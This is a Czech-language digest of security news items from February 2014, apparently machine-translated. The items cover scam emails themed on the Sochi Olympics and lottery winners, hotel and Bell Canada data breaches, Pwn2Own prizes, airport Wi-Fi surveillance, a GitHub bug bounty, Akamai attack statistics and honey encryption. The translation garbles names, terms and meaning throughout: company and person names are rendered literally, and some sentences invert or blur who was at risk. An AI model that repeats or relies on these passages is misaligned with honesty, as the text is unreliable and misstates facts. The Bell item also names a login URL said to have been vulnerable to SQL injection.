XXII Zimní olympijské hry oficiálně se k ní dne 7. února. Samozřejmě, že to hlavní sportovní událost není bez povšimnutí ze strany spammery. V "nigerijské" podvodníci nemohli odolat buď na konci ledna jsme obdrželi zajímavou korespondenci od někoho, kdo hledá za důvěryhodnou osobu v Rusku, kteří by mohli přenést 850.000 eur na. Chcete-li vysvětlit tak neobvyklý požadavek, autor nepoužil standardní "nigerijské" příběhy, ale citoval výlet na olympijských hrách - peníze byly potřeba pro skupinu šesti lidí, kteří se údajně určených k pobytu v Soči. Pro další informace, příjemce této velkorysé nabídce museli kontaktovat odesílatele.
Zdánlivě neškodné žádost o pomoc při organizování výlet vyklube past, s obvyklou velkou sumu peněz jako návnadu. Odkaz na skutečné události se používá přesvědčit příjemce, že žádost je skutečný. Ale výsledek je vždy stejný - spammer žádá příjemce přenést určité množství peněz, například na pokrytí nákladů na přenos, a poté, že podvodník zmizí beze stopy.
Milionáři chtějí podělit o své peníze
10.2.2014 Spam
Dopisy o loterii vyhraje jsou standardní trik používá "nigerijské" podvodníky. Velmi často se autor těchto dopisů vysvětlit, že on je šťastný vítěz loterie vyhrát multi-milión, a on neví, jak strávit nečekanou výhru, a rozhodla se obrátit na filantropii.
Během několika posledních měsíců jsme objevili několik nevyžádané zprávy odeslané ve jménu různých lidí, kteří se údajně vyhrál v loterii v posledních několika letech. Například v prosinci 2013 jsme obdrželi několik zpráv odeslaných v různých spamových zásilek a odeslané ve jménu téhož páru, který svou loterii vyhrát obdržel v roce 2012. Tyto dopisy měly různé návrhy a řekl, různé příběhy, ale všechny z nich nabídl totožnou částku ve výši 800000 liber na potenciální oběti, a dal stejný odkaz na video z tohoto rozhovoru vítěz loterie, jako způsob, jak přesvědčit čtenáře, že příběh byl pravdivý . Podvodníci se snažil být velmi stručný a neposkytl žádné informace v těle zprávy. Nicméně, zprávy v jednom z korespondence obsahovala text říká, že e-mailová adresa příjemce byl vybrán jako vítěz v charitativním projektu spolu s dvěma dalšími.
Podvodníci také použít jména jiného páru, který zřejmě vyhrál v loterii v listopadu 2013 znovu, aby se jejich podvod zprávy vypadají platnost. Tentokrát podvodníci řekl pár dělali dar ve výši 1.000.000 liber. Tam bylo v dopise žádné podrobnosti o tom, jak se čtenář mohl získat peníze, nebo proto, že loterie Vítězové rozhodli podělit se o peníze s konkrétní příjemce. Chcete-li zjistit, že informace, rádoby oběť měla odpovědět na podvod zprávy.
Podvodníci také použít novější případy. V polovině prosince 2013 se běžný Kanaďan vyhrál 40.000.000 dolarů v loterii, začátkem ledna 2014 jsme zjistili podvod pošty ve jménu nově ražené milionáře. Není překvapením, že podvodníci pokusili nalákat příjemce tím, že slíbí dát 1200000 dolarů a vyprávět příběh, že milionář se nyní dává pryč celý svůj majetek na památku své manželky, která zemřela na rakovinu dva roky dříve.
Chcete-li vytvořit nové pozemky pro své dopisy, podvodníci používají různé skutečné události, včetně obou tragédií ( úmrtí celebrit , teroristické útoky , přírodní katastrofy ) a pozitivních akcí, jako je loterie vyhraje. Ale bez ohledu na to, co je předmětem je podvod zpráv, není vůbec věřit, že odesílatel ve skutečnosti podělit se o své peníze s vámi. Nezapomeňte, že odkazy na skutečná jména a odkazy na skutečné publikací v renomovaných médiích nejsou zárukou toho, že vás někdo řekl pravdu.
Hotel management firmy porušena, údaje o platební kartě hostů na ukradený
10.2.2014 Bezpečnost
Hotel vedení firmy White Ubytování se zdá k měli jeho systémy ohrožena a útočníci se podařilo exfiltrate dosud neznámé množství kreditních a debetních karet podrobnosti.
Porušení je stále nepotvrzených společnost, která se stále vyšetřuje tvrzení a řekl, že bude "poskytovat smysluplné informace, jakmile budou k dispozici." "Začátkem tohoto měsíce, více zdrojů v bankovním sektoru začaly sdílení dat naznačuje, že byly vidět vzor podvodu na stovky karet, které byly všechny dříve používané v hotelech Marriott zhruba od 23.března 2013 na až do konce loňského roku, " hlásil Brian Krebs. "Ale ty sames zdroje uvedli, že byli na rozpacích z charakteru podvodu , protože to bylo vidět pouze na konkrétní Marriott hotelů, včetně míst v Austinu, Chicago Denver, Los Angeles, Louisville a Tampa. " Deeper badatel odkryl společné vazby mezi nimi: oni jsou provozovány White Ubytování. Také, jak to dopadá Zákazníci, kteří zaplatili za jejich pobytu na recepci jednoho Marriott nejsou v nebezpečí, nebo že jejich informace zneužity, protože řetěz je povinné pro všechny své hotely - dokonce i ty, působila jako povolení -. používat svůj systém správy nemovitostí je je ti, kteří jedli v hotelech "restaurací a nakupovali na svých obchodů se suvenýry, které si jejich informace ukradené, a bude dělat dobře kontrolovat jejich prohlášení karty pečlivě neoprávněné poplatky. White Ubytování také provozuje hotel franšízy v hotelu Hilton, Sheraton a Westin značky, ale zda jejich hosté byli postiženi stejně je zatím být objeven.
Pwn2Own 2014: 150.000 dolar za "zneužití jednorožec"
10.2.2014 Výzkum
Existuje několik nová pravidla pro letošním ročníku hackerské soutěže Pwn2Own a obrovské nové ocenění pro "Exploit Unicorn hodné mýtů a legend" - 150000 dolarů na realizaci systému na úrovni kódu v systému Windows 8.1 x64 pro Internet Explorer 11 x64 s Emet obtokem.
Zprávy byly oznámil manažerem HP ZDI Brian Gorenc, který vysvětlil, že "zkrocení exploit Jednorožec je proces, multi-step", která má následovat přísný pořadí:
Počáteční zranitelnost používaný při útoku musí být v prohlížeči. Pískoviště prohlížeče musí být odpojeny pomocí zranitelnosti v pískovišti. Samostatný zvýšení úrovně oprávnění Zranitelnost je nutné použít k získání SYSTEM-level spuštění libovolného kódu na cíl. Využití musí pracovat, když jsou zapnuty Microsoft Enhanced Mitigation Experience Toolkit (Emet) ochrany.
Bezpečnostní výzkumníci vzali na Twitter komentář k tomuto Unicorn cenu, některé komentoval sporný pořadí, a jiní o tom, zda cena stálo "pálení" tři zero-day exploity, když dva by mohlo být dost. Nicméně, problém je dobrý . k bubnování nadšení pro nadcházející soutěže, a pro testování dovedností soutěžících Další dvě kategorie soutěže jsou stejné jako v loňském roce: Prohlížeče a moduly plug-in. Výzkumníci, že se podaří rozlousknout Chrome nebo Internet Explorer v systému Windows 8.1 X64 dostane $ 100,000 těch, kteří úspěšně rozbít Firefox (také v systému Windows) nebo Apple Safari na Mac OS X Mavericks dostane 50.000 dolarů a 65.000 dolar, resp. Hacking Adobe Reader nebo Flash na IE 11 na Windows budou odměněni 75000 dolarů, zatímco obchází Java na stejné nastavení s 30.000 dolarů. Úspěšní soutěžící obdrží také notebook, na které prokáží kompromis, stejně jako 20000 ZDI věrnostní body, které se automaticky kvalifikuje pro jednorázové 5.000 dolarů v hotovosti výplatu, 15% peněžní bonus a 25% Odměnou bod bonus na všech zranitelností předložených ZDI během příštího kalendářního roku, a placených cestování a registraci, aby se zúčastnili v roce 2014 DEFCON konferenci v Las Vegas. Zájemci mohou najít kompletní pravidla letošního ročníku soutěže zde.
Narušení bezpečnosti, ztráty dat a výpadky náklady nemocnic v USA $ 1.6B
10.2.2014 Bezpečnost | Kriminalita
Nová zpráva MeriTalk, na základě průzkumu zdravotní IT manažerů a uzavírat EMC, kvantifikuje organizační náklady spojené s narušením bezpečnosti, ztráty dat, a neplánovaných odstávek pro poskytovatele zdravotní péče, a to na více než 1.6B dolarů ročně.
Údaje o zdravotním stavu je často terčem pro nebezpečné činnosti a 61 procent světových zdravotnických organizací dotazovaných zažili vztahující se k bezpečnosti incident v podobě narušení bezpečnosti, ztráty dat, nebo neplánovanými prostoji alespoň jednou v posledních 12 měsících. narušení bezpečnosti: Téměř jeden z pěti (19 procent) světových zdravotnických organizací došlo k porušení zabezpečení v posledních 12 měsících za cenu 810,189 dolarů za incident. Vedoucí Health IT říkají, že nejčastější příčiny breaches patří malware a viry (58 procent); outsider útočí (42 procent), fyzické bezpečnosti - ztráty / krádeže zařízení (38 procent) a chybové uživatelů (35 procent). Ztráta dat: Téměř jeden ze tří (28 procent) světových zdravotnických organizací došlo ke ztrátě dat v posledních 12 měsících v celkové hodnotě 807.571 dolar za incident. A z těch, více než třetina (39 procent) zažily 5 nebo více výskyt ztráty dat v uplynulých 12 měsících. Běžné příčiny ztráty dat patří selhání hardwaru (51 procent), ztráta síly (49 procent) a ztrátu záložního napájení (27 procent). neplánovaných výpadcích: Téměř dva z pěti (40 procent), globální zdravotnické organizace zažili neplánované výpadek v posledních 12 měsících za cenu 432.000 dolarů za incident. V průměru zdravotnické organizace ztratily 57 hodin na neplánovaných prostojů během posledních 12 měsíců. Mezi nejčastější příčiny výpadků patří selhání hardwaru (65 procent), ztráta energie (49 procent), selhání software (31 procent). A dat korupce (24 procent), poskytovatelé uznávají, tam je více práce je třeba udělat. Méně než jeden-na-tři respondenti (27 procent) věří, že jejich organizace je plně připraven pro zajištění nepřetržité dostupnosti ePHI při neplánovaných výpadků, zotavení po havárii, nebo provoz nouzového režimu. A poté, co tísňové uplynulo pouze 50 procent respondentů věří, ve schopnosti jejich organizace obnovit 100 procent údajů požadovaných SLA. Více než polovina (56 procent) by bylo třeba osm hodin nebo více k obnovení 100 procent dat. Většina - 82 procent - tvrdí, že jejich technologie, infrastruktura není plně připraven na incidentu zotavení po havárii. uznávajíce význam důvěryhodných IT řešení, organizace v plánu zaměřit se na šifrování chráněné zdravotní informace (55 procent), v souladu s analýzou bezpečnostních rizik EMR smysluplné využití požadavky (54 procent);. a prevence a detekce narušení (44 procent), "Zdravotnictví organizace dělají značné investice do IT pro transformaci IT infrastruktury a zajistit, aby informace, pacient je bezpečné, chráněné a vysoce dostupné," říká Scott Filion, generální ředitel, Global Healthcare, EMC Corporation. "Důvěra se stala prioritou obchodní board-úrovni. Zdravotnické organizace se vždy zaměřuje na informační bezpečnosti, ale dnes musí udělat více pro ochranu dat a zajištění dostupnosti pro splnění požadavků ARRA HITECH HIPPA. " Ze zdravotnických organizací, které nejsou v současné době nabízejí zvláštní schopnosti IT "jako služba", polovina plánu k tomu, aby během příštích pěti let. Řada států přijímá klíčové kroky k přípravě - včetně:
HIPAA Security Analýza rizik jako součást EMR smysluplné využití požadavků na 46%
Single Sign On a ověřování pro webové aplikace a portály: 44%
Nástroje pro audit a řízení log: 43%
Šifrování pro chráněné zdravotní informace: 42%
Multi-faktor autentizace pro vzdálený přístup pro klinické pracovníky k sítím (včetně ePHI) na dálku: 35%
Analytics zabezpečení, které pomáhají s prevencí narušení: 32%
Centralizovaná správa a ověřený přístup ke zdravotním informacím: 31%
Data Loss Prevention sledovat umístění a tok citlivých údajů: 29%.
Řešení pro upevnění unesených nastavení Chrome
10.2.2014 Zabezpečení
Mnoho uživatelů - ne-li všechny - zažili stažení zdarma spořič obrazovky nebo hry, aniž by při pohledu na malým písmem, a v důsledku toho, jak se jejich prohlížeč nevědomky zatížena nežádoucím nástrojů, add-on nebo homepage. Podle Linus Upson, Google VP Engineering, Problém nastavení unesených prohlížeče je ten, který trápí mnoho uživatelů Chrome. Loni v říjnu, firma přidáno tlačítko "reset nastavení prohlížeče" na svém prohlížeči, ale to je zřejmě nestačí, a že nyní začne uživatelům Windows, jejichž nastavení byly změněny, pokud by chtěli obnovit jejich nastavení prohlížeče zpět do továrního nastavení s dotazem :
Varianta přichází s varováním: krok bude také zakázat (ale ne odinstalovat) Nezáleží Rozšíření, aplikace nebo motivy jsou uživatelé sami se rozhodli použít. Naštěstí se aplikace bude automaticky znovu aktivována, když uživatelé používají se jim velmi příště a vybrané rozšíření lze jednoduše znovu aktivovat ručně. Tento nejnovější přírůstek z týmu Chrome byl zaveden, protože někdy únosci zanechat procesy zaměřené na podkopání uživatelský ovládací prvek nastavení opakovaně po krátké časové úseky byly předány. budou Tato nová funkce neřeší Tento druhý problém trvale, ale umožní uživatelům low-level dočasně odstranit takové obtíže s jediným kliknutím tlačítka. Ti, kteří hledají více trvalé řešení - tj. odinstalování nastavení tichého přesměrování programů - se doporučuje vyzkoušet Chrome Fórum nápovědy pro krok-za-krokem
Dell vydává bezpečné, spravované, ultra-mobilní cloud přístup k zařízení
10.2.2014 Mobil
Společnost Dell oznámila, Dell Wyse Cloud Connect, ultra-kompaktní a vysoce mobilní cloud pro přístup k zařízení, o který přináší virtualizaci desktopů a osobní služby cloudu na jakékoli HDMI nebo MHL povoleným displeji.
Kapesní přístroj nabízí full-HD zkušenosti s bezpečností na podnikové úrovni, ovladatelnost a spolehlivost. Zařízení podporuje různé případy použití, včetně mobilních pracovníků, studentů, digital signage, kiosků a jiných prostředích s omezeným prostorem. Konkrétní výhody pro zákazníka patří:
Rychlý a bezpečný přístup mobilních a vzdálených pracovníků do virtuálních desktopů a různých cloudových majetku, včetně obsahu, aplikací, virtuálních desktopů a IT podpory
Na osobních počítačích se systémem Microsoft Windows OS nebo Apple Mac OS přístup k datům, obsahu nebo aplikace Snadné vzdálené připojení
Plug-and-play interaktivních prezentací běží v rozlišení Full-HD přímo z cloudu nebo zařízení, na jakémkoli kompatibilním displeji
Kapesní velikost, bez baterií alternativa v případě ztráty, odcizení nebo selhání primární zařízení
Cost-efektivní virtuální desktop na trhu vzdělávání, rozšiřování aplikací a přístup k datům v učebnách, knihovnách, laboratořích nebo doma
Digital signage řešení se zjednodušenou, vzdálenou správu pro letiště, maloobchodníci, pohostinství, nebo jiných organizací
Osobní cloud přístup k on-line zábavě, hraní her, aplikací a bohatého obsahu na velkých displejích.
"Cloud Connect je jedním z nejvíce řezání-hrana mobilní tenký klient řešení, které jsme otestovali v našich laboratořích," řekl Joseph Koré, vrchní ředitel a vedoucí Kochi operací, obeznámeny. "Díky schopnosti hladce pracovat s prostředí Citrix, Microsoft a VMware, řešení má velký potenciál pro futuristické podnik, který hledá způsoby, jak zlepšit produktivitu při práci a na cestách pro své podnikové pracovní síly." Cloud Connect je 129 dolarů za jednotku . Doplňkové Dell příslušenství včetně MHL-schopných displejů a klávesnic Bluetooth a myši jsou také k dispozici.
Hackeři porušení Bell Canada, úniku zákaznické informace a hesla
10.2.2014 Incidenty | Hacking
Hacker skupina NullCrew se podařilo pro přístup k serverům, které patří do Bell Canada - nebo dodavatel třetí strany, jako Bell tvrdí - a krást a v konečném důsledku úniku uživatelská jména a hesla, e-mailové adresy, dílčí údaje o kreditní kartě a více asi 20.000 + zákazníků Bell. NullCrew hackeři oznámila, že únik před několika týdny, a byly zveřejněny údaje výpisem tuto sobotu. Místo hosting výpis byl uveden do režimu offline, ale ne dříve, než někteří výzkumníci zabezpečení a pravděpodobně někteří počítačoví podvodníci se podařilo stáhnout. blogger za DataBreaches.net se dotazoval na hackery, a bylo prokázáno screenshotů z rozhovorů a na hacking procesu, který doložit své tvrzení, že oni měli přístup k serveru Bellova pro měsíce, a že oni (neúspěšně) pokusil informovat Bell ní a zranitelnosti, která jim umožnila montáž SQL injekce proti řízení ochrany přihlašovací stránce společnosti (https:/ / protectionmanagement.bell.ca/passwordrecovery_1.asp). Po krátkém vyšetřování, Bell Canada potvrdil informace kompromis, ale řekl, že servery v otázce nejsou jejich. "Bell dnes oznámila, že 22.421 uživatelská jména a hesla a 5 platnou kreditní kartu počet Bell malé firemní zákazníky byly zveřejněny na internetu tento víkend. vysílání výsledky z nelegální hacking informačních technologií systému Ottawa na bázi třetí strany dodavatele to, "že uvedl v neděli. "V souladu s našimi přísnými zásadami ochrany osobních údajů a bezpečnosti , Bell je kontaktovat postižených malých firemních zákazníků, má zakázané všechny dotčené hesla, a informoval příslušné společnosti vydávající kreditní karty. Budeme i nadále spolupracovat s dodavateli, stejně jako prosazování práva a bezpečnostním vládní úředníky, aby věc vyšetřil. vlastní sítě Bellova a IT systémy nebyly ovlivněny. " NullCrew stále tvrdí, že je to vlastní servery, Bell, který dostal hacknutý, ale společnost zopakovala své tvrzení, že patří k dodavateli třetí strany. Security badatel Adam Caudill komentoval na Twitteru, že Bellova verze by mohla být pravda. "Viděl jsem více než jednou, kde subdoména velké společnosti bodů na třetí osobu," řekl řekl a dodal, že jeho společnost hostí jeden pro "velmi velké banka ". "Tak to je docela možné, že se pravdu. Měly by trvat ještě větší zodpovědnost za své údaje však," dodal. Dalším Twitter uživatel hledal šetření subdomény v otázce, a ukázalo se, že je registrován Ottawa bázi Magma komunikace.
Kanadská špionážní agentura používá na letiště zdarma Wi-Fi sledovat cestující
8.2.2014 Špionáž
Nová zpráva na základě dokumentů poskytnutých NSA informátorů Edward Snowdena bude Kanaďané otázku, zda elektronické špionážní agentura v zemi dělá, jak tvrdí, práci v mezích stanovených zákonem. 27.-strana-dlouhé prezentace PowerPoint ze dne 05. 2012 a potvrzené se vytvoření zabezpečení komunikace Kanada (CSEC) logo informací, jak agentura shromážděných informací (metadata identifikující bezdrátová zařízení, jejich umístění, hovory) z bezplatné Wi-Fi nabízené služby na hlavních kanadských letištích, aby bylo možné sledovat uživatelům zařízení "několik dní po odešli na letiště a připojen k bezplatné Wi-Fi hot spotů v celé Kanadě. Protože systém nemá žádný způsob, jak zjistit, zda majitel zařízení je Kanaďan, nebo ne, to dá rozum, že mezi údajů shromážděných agenturou je rovněž údaje, které mohou být použity identifikovat kanadské občany, a objevit své pohyby. Ronald Deibert, vedoucí Citizen Lab na University of Toronto, která se zaměřuje svůj výzkum na globální bezpečnosti a lidských práv, řekl, že věří, že praxe je téměř jistě nezákonné. CSEC uvedl, že je "pověřila sbírat cizí signály inteligenci chránit Kanadu a Kanaďany", a má proto právní pravomoc shromažďovat a analyzovat metadata. "Je to opravdu neuvěřitelné, že CSEC by se zabýval tímto druhem dohledu Kanaďanů. Of nás," komentoval Ann Cavoukian , Komisař pro ochranu soukromí Ontario. "To se podobá činnosti totalitního státu, ne svobodné a otevřené společnosti." To je neznámo jak agentura vlastně dostal bezdrátová data, hlásí kanadský Broadcasting Corporation (CBC). Dokument říká, že data byla dobrovolně "speciální zdroj", ale Toronto a Vancouver Airport úřady, které pracují Wi-Fi služby svých letištích ", popřel poskytování údajů, které každém kanadské rozvědky, a stejně tak Boingo, společnost se sídlem v USA, která provozuje tyto služby v jiných letištích v Kanadě . Dokument také naznačuje, že shromážděné informace, které mají být sdíleny s ostatními členy Pět Oči zpravodajské sítě:. USA, Velké Británii, Austrálii a na Novém Zélandu
Yahoo Mail účty ohrožena v koordinovaný útok
8.2.2014 Incident | Kriminalita | Hacking
Neznámý útočník se pokusil o přístup k několika Yahoo Mail účty, společnost varoval ve čtvrtek, a vyzval uživatelům změnit své heslo, i když nebyly ovlivněny.
"Na našich současných poznatků, seznam uživatelských jmen a hesel, které byly použity k provedení útoku byl pravděpodobně shromážděny z databáze třetí strany kompromisu. Nemáme žádný důkaz, že byly získány přímo od systémů Yahoo," sdílené Jay Rossiter, Yahoo senior viceprezident platforem a personalizace výrobků. "Naše pokračující vyšetřování ukazuje, že škodlivý počítačový software používá seznam uživatelských jmen a hesel pro přístup k Yahoo Mail účty. Informace požadované v útoku se zdá být jména a e-mailové adresy z nejvíce postižených účty" poslední odeslané e-maily. " Společnost provedl reset hesla na impaktovaných účtů, a dotčené uživatelé budou vyzváni k opětovnému zajištění jejich účty změnou hesla. "Kromě přijímání lepších heslo postupy změnou své heslo pravidelně a za použití různých variant symbolů a postav, uživatelé by nikdy neměli používat stejné heslo na více místech nebo služeb, "dodal. "Použití stejné heslo na více místech nebo služeb činí uživatelům obzvláště zranitelné vůči těmto typům útoků." Společnost neřekl, kolik mailové účty byly ovlivněny. napadených účtů mohly být použity k rozesílání nevyžádané pošty přímo, ale Shromážděné informace (jména a e-maily kontakty "), lze také použít, aby se scammy e-maily z jiných zdrojů vypadat legitimní.
GitHub nastaví chyba nájemný programu
8.2.2014 Zranitelnosti
GitHub je nejnovější služba oznámila, že oni začali bezpečnostní chyba bounty program. "Myšlenka je jednoduchá: hackeři a výzkumníci bezpečnostních najít a nahlásit chyby zabezpečení prostřednictvím našeho odpovědného procesu zveřejňování Pak uznat značné úsilí, aby tito výzkumníci často vztáhl. při lovu se chyby, budeme odměnou jim s trochou studené tvrdé hotovosti, "uvedli ve svém blogu ve čtvrtek. Odměny se budou pohybovat od 100 dolarů až na $ 5000 a skutečné částky, které mají být rozhodnuto tým na případ od případu podle , a tím, že v úvahu řadu faktorů. "Například, pokud zjistíte, že odražené XSS, které je možné pouze v Opeře, a Opera je <2% našeho provozu, pak závažnost a odměna bude nižší. ale přetrvávající XSS, který pracuje v Chrome, při> 60% našeho provozu, bude vydělávat mnohem větší odměnu, "vysvětlili. Zpočátku se bug bounty omezena na zranitelnosti objevené v hlavním webových stránkách GitHub je ( Github.com ), na GitHub API, a GitHub Gist, služba pro sdílení úryvky kódu nebo jiného obsahu textu. Tým říká, že budou reagovat tak rychle, jak je to možné tím, co tvrdí, a udržet zadavatel aktualizován pracují na opravy chyby. "Nebudeme podniknout právní kroky proti vám, pokud budete hrát podle pravidel , "oni se o to přidat.
Globální pohled na útoku provozu a bezpečnosti
8.2.2014 Bezpečnost | Ochrana
Akamai vydala svou poslední zprávu , která poskytuje vhled do hlavních globálních statistik o útoku provozu a bezpečnosti. Akamai udržuje distribuovaný soubor budoucnu nebyly propagovány agentů nasazených přes internet, které se přihlašují pokusy o připojení, které společnost klasifikuje jako útok provozu. Na základě údajů získaných těmito původci základě Akamai je schopen identifikovat vedoucí země ze které napadají traffic pochází, jakož i jako top ports na které se tyto útoky. To je důležité pro poznámku, nicméně, že země původu označeného zdrojová IP adresa nemůže zastupovat národ, ve kterém útočník nachází. Například, jednotlivec ve Spojených státech může být zahájení útoků z napadených systémů kdekoli na světě. Akamai pozorován útok provoz pocházející ze 185 unikátních zemích / oblastech během třetího čtvrtletí roku 2013, a to až 10 více než v předchozím čtvrtletí. Čína, která pochází 35 procent sledovaných útoků, se vrátil na první místo v tomto čtvrtletí poté, co byl sesazen Indonésií ve druhém čtvrtletí. Indonésie, mezitím klesla zpět na druhé místo po původních 20 procent sledovaných útoků - o něco více než polovina objemu vidět ve druhém čtvrtletí. Spojené státy zůstala na třetím místě, jak to vzniklo 11 procent sledovaných útoků během třetího čtvrtletí, a to až z 6,9 procenta v předchozím čtvrtletí. Celkově koncentrace útoků klesl během třetího čtvrtletí roku 2013, s top 10 zemí původu 83 procent sledovaných útoků, ve srovnání s 89 procent ve druhém čtvrtletí. Čína a Indonésie, nicméně, pokračoval pochází více než polovina všech sledovaných útoku provozu. Poté, co klesl na třetí místo v druhém čtvrtletí, Port 445 (Microsoft-DS) se vrátil na své místo jako nejvíce cílené přístavu ve třetím čtvrtletí čerpání 23 procent z pozorovaných útoků. Port 80 (WWW [HTTP]) a port 443 (SSL [HTTPS]) klesl na druhé a třetí místo na 14 a 13 procent, resp. Port 445 je nejvíce zaměřena přístav v osmi z top 10 zemí / regionů, jedinou výjimkou je Čína a Indonésie. Port 1433 (Microsoft SQL Server) byl nejvyšší cíl pro Čínu a port 443 byl nejvíce cílené z Indonésie. Kromě vyjádření k útoku provozu, stát Internet zprávě obsahuje vhled do DDoS útoků na základě zpráv od zákazníků Akamai. Poprvé od čtvrtého čtvrtletí roku 2012, kdy začal Akamai podávání zpráv o DDoS útoků, méně útoky byly hlášeny než v předchozím čtvrtletí, s 281 pozorováno ve třetím čtvrtletí roku 2013 ve srovnání s 318 v průběhu druhého čtvrtletí (pokles o 11 procent). Celkově lze říci, Akamai viděl další útoky přes třetí čtvrtletí roku 2013 (807), než tomu bylo ve všech 2012 (768). podnikatelský sektor i nadále být vedoucím terčem DDoS útoků s 127 hlášených ve třetím čtvrtletí, obchod byl vedle s 80, následuje Media & Entertainment (42), veřejném sektoru (18) a High Tech (14). Akamai také začala zkoumat pravděpodobnost, že zaútočit na cíle mohou být předmětem následné útoky. Z 281 za třetí čtvrtletí útoků, 169 byly zaměřeny na jedinečných cílů. V průběhu čtvrtletí, 27 zákazníci byli napadeni podruhé, pět hlášeny tři útoky a sedm společností byly napadeny více než třikrát. Počáteční analýza údajů naznačuje, že pokud společnost je terčem útoku DDoS, tam je 25 procent šance, že by mohl být napaden znovu do tří měsíců.
Jak obnovit smazané nebo poškozené digitální měnu
8.2.2014 Bezpečnost
Popularita Bitcoin a další digitální / šifrovací měny nelze popřít. Různí uživatelé rádi používají to z různých důvodů, ale mnozí souhlasí s tím, že otázka zachování jejich skrýš bezpečná je něco, co se občas drží je až v noci. , začali různé služby s měnou je rostoucí popularitou vyskakování pomoci vyřešit tento dilema. Přesto, někteří se rozhodli, aby jejich digitální peníze na vlastních zařízeních. Ale co se stane, pokud tato zařízení rozebrat, dojde k poškození, nebo si omylem vymazal? Chris Bross, Senior Enterprise Recovery inženýr dobře-známý pro obnovu dat firmy DriveSavers, nedávno byl zapojený do několika málo případech, kdy zákazníci potřebují jejich digitální měnu zpět. " V minulosti jsme obvykle byli požádáni, aby obnovit uživatelem vytvořené datové soubory, jako jsou fotografie, QuickBooks, videa, atd. Nyní jsou vyzváni k obnovení digitální měně, "sdílel s Help Net Security. "Nechtěli jsme především začít nabízet služby pro obnovu uživatelům Bitcoin, zákazníci prostě k nám přišel prosit o pomoc." Obvykle se hodnota údajů o každém zařízení je měřen uživatele, kterému patří. Proces obnovy může být poměrně drahé, ale když Bitcoins jsou v sázce, je hodnota oživení je ještě více vyplatí. Zatím, společnost má 8 žádosti o obnovu digitální měna, 7 pro Bitcoin a 1 pro Litecoin. "V Obecně platí, že selhání hardwaru skladovacích zařízení jsou častější, ale v mnoha případech uživatelé byli zcela na omylu, protože vymazány údaje, a ve dvou případech dokonce přepsal ji, "vysvětlil. Tyto dvě případů skončila s odborníky vymáhání wallet.dat soubory, ale šifrovaná data byl bohužel poškozen za opravou. "Jak jsem řekl, není situace zcela beznadějná a vždy chceme pokusit se o obnovu dat, co nejdříve poté, co k události došlo ke ztrátě dat, aby zabránit uživateli dělat špatná volba, která vede k dalšímu poklesu, "poznamenává. Zatímco společnost většinou pro více s firmami, které potřebují obnovit data, všechny jejich žádosti o Bitcoin oživení dosud byli od jednotlivců. "Téměř ve všech případech uživatel držel pouze jednu kopii svého wallet.dat souboru na jednom paměťovém zařízení, "říká Bross." Tři z osmi celkového počtu případů byly uloženy na SSD (prodává state drive), zatímco jiní byli on HDD. Ve všech případech, uživatelé nevěřila dostupné zálohování cloud nebo jiné možnosti replikovat svá důležitá data Bitcoin. " V jednom konkrétním případě, kdy zákazník uložené své digitální peněženku na jeho Microsoft Surface Pro tablety, provedl řadu kroků, které vedly k ztrátě dat a zdravotně postižené schopnost počítače až k bota autobus, museli vyvinout novou metodu, aby mohli vytvořit obraz o SSD, aniž by fyzicky vytahování z tabletu. "Vzhledem k tomu, že byl SSD, tam byly obavy BGC (pozadí sběr odpadků), procesy, které by se mazat a dezinfikovat chybějící údaje jako normální funkce údržby systému. Potřebovali jsme, aby zachytit a zastavit ty procesy, ke zmírnění žádnou doplňkovou ztrátu dat, "sdílel. "Myslíte si také nabízí službu sledování a vymáhání ukradené Bitcoin?" zeptal jsem se a dostal negativní odpověď. "I když děláme nabídku forenzní služby pro obnovu dat na žádném případě, že mohou skončit v soudním řízení nebo stíhání, "poznamenal Bross. Nakonec jsem se ho zeptal sdílet několik tipů na to, jak udržet své digitální měnu v bezpečí. "Tisk na papír. Ironií je, že v dnešní moderní době digitální všechno, papír a inkoust jsou spolehlivější a vydrží déle než magnetické nebo skladování pevného stavu, "nabídl se. "Kromě toho, aby více kopií souborů na jiné zabezpečené a šifrované média, která vás osobně kontrolu sami. Pokud se rozhodnete uložit tato data do cloudu, být dobře informováni o možných cloud bezpečnostních chyb a rizik.
"Miláčku šifrování" přemůže útočníky s falešnými výsledky
8.2.2014 Šifrování
Bývalý šéf RSA vědec Ari Juels pracuje na inovativním přístupem k šifrování, které by mohly učinit kybernetické podvodníci ", jako je mnohem obtížnější.
Tento nový šifrovací systém - přezdívaná "Honey šifrování" - nespoléhá na složitější šifrovací algoritmus, ale na to, že pokaždé, když se útočníci pokusí dešifrovat data nebo odhadnout (hrubou silou) heslo, systém vrátí realisticky vypadající údajů -. zda odhad je správný, nebo ne "Každý dešifrování bude vypadat věrohodně," říká Juels. "Útočník nemá žádný způsob, jak se odlišit a priori, který je správný." A bude proto muset testovat všechny výsledky, pokud se chce dostat ke správnému -. Potenciálně nelehký úkol, který nebude stát za námahu přístupu a systém je založen na research Juels prováděné u Thomase Ristenpart, asistent profesor na University of Wisconsin, ve kterém předložila myšlenku "honeywords" - falešných hesel -. jsou spojeny s uživatelskými účty spolu se správnému " Protivník, který krade soubor hash hesla a invertuje funkci hash nelze říci, zda našel heslo nebo honeyword. pokus o použití honeyword pro přihlášení spustí alarm, "vysvětlili. Juels věří Honey šifrování může být Velkou pomocí pro manažerské heslo služby, jejichž celý on-line život uživatelů závisí na jediném hlavním heslem. Podle MIT Technology Review , je to v současné době pracuje na vytvoření falešné heslo úložiště generátor, který by poskytoval falešné výsledky. Vzhledem k tomu, obrovský počet přihlášení pověření ukradené a unikly v posledních několika letech a menší z uniklých správce hesel klenby, vytvoření věrohodné falešné výsledky by měly být snadný úkol.
Nové informace o cílové porušení vyjdou na světlo
8.2.2014 Incidenty
Protože jsou datová výpisy z karty ukradené v cílovém porušení i nadále prodávat na podzemních počítačové kriminality fórech, a ukradené informace jsou využívány k provádění unauthorized platby, americký generální prokurátor Eric Držitele uvedl, ministerstvo spravedlnosti je "odhodlán zasadit se o nenacházím pouze pachatelé těchto druhů narušení dat - ale také případné jednotlivců a skupin, kteří využívají tato data prostřednictvím podvodů s kreditními kartami ".
